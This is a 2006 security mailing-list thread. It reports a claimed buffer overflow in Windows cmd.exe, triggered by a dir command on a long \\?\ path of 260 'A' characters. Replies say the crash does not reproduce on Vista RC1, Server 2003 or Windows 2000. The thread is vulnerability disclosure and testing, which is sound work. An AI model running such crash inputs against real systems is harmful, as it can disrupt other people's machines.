Vulnerability Development: RE: Windows Command Processor CMD.EXE Buffer Overflow

From: RockyH <rocky.he_at_g-wizinnovations.com>
Date: Sun, 22 Oct 2006 00:05:16 +1000

It didn't work on Windows Server 2003 or Windows 2000 either. (fully patched
and latest SPs)

RH

-----Original Message-----
From: listbounce_at_securityfocus.com [mailto:listbounce_at_securityfocus.com] On
Behalf Of Osvaldo Casagrande
Sent: Friday, 20 October 2006 9:52 PM
To: gregory_panakkal; vuln-dev_at_securityfocus.com
Subject: RE: Windows Command Processor CMD.EXE Buffer Overflow

It does not work on Windows Vista RC1 (5728)

Osvaldo Casagrande
MCSE. MCT, MVP, Security+
Services Manager
DiviServ S.A.
D: 595(21) 613 828 | Cel. 595 (971) 300 836 | ocasagrande_at_diviserv.com

Looking for my personal references?
Access to MVP Program - Access to MS Certifications: On "Transcript ID"
input: 740381 / On "Access Code" input: ViewMyInfo

Running Windows Vista RC1- Build 5728 and Office 2007 Beta 2 TR

This mail message may contain confidential and/or privileged information for
the addressee. If you are not the addressee or authorized to receive this for
the addressee, you must not use, copy, print, retransmit, disclose or take
any action based on this message or any information herein. If you have
received this message by mistake, please advise the sender immediately by
replying to this message and delete it from your computer and any database.
DIVISERV appreciates your cooperation.

-----Original Message-----
From: listbounce_at_securityfocus.com [mailto:listbounce_at_securityfocus.com] On
Behalf Of gregory_panakkal
Sent: Wednesday, October 18, 2006 11:33 PM
To: vuln-dev_at_securityfocus.com
Subject: Windows Command Processor CMD.EXE Buffer Overflow

Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low

Copy-paste the following line into cmd.exe and execute it.
(It is a single command; it has been split into multiple lines for
readability's sake.)

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL : http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com

-- 
  gregory_panakkal
  gregory_panakkal_at_fastmail.fm
Received on Oct 21 2006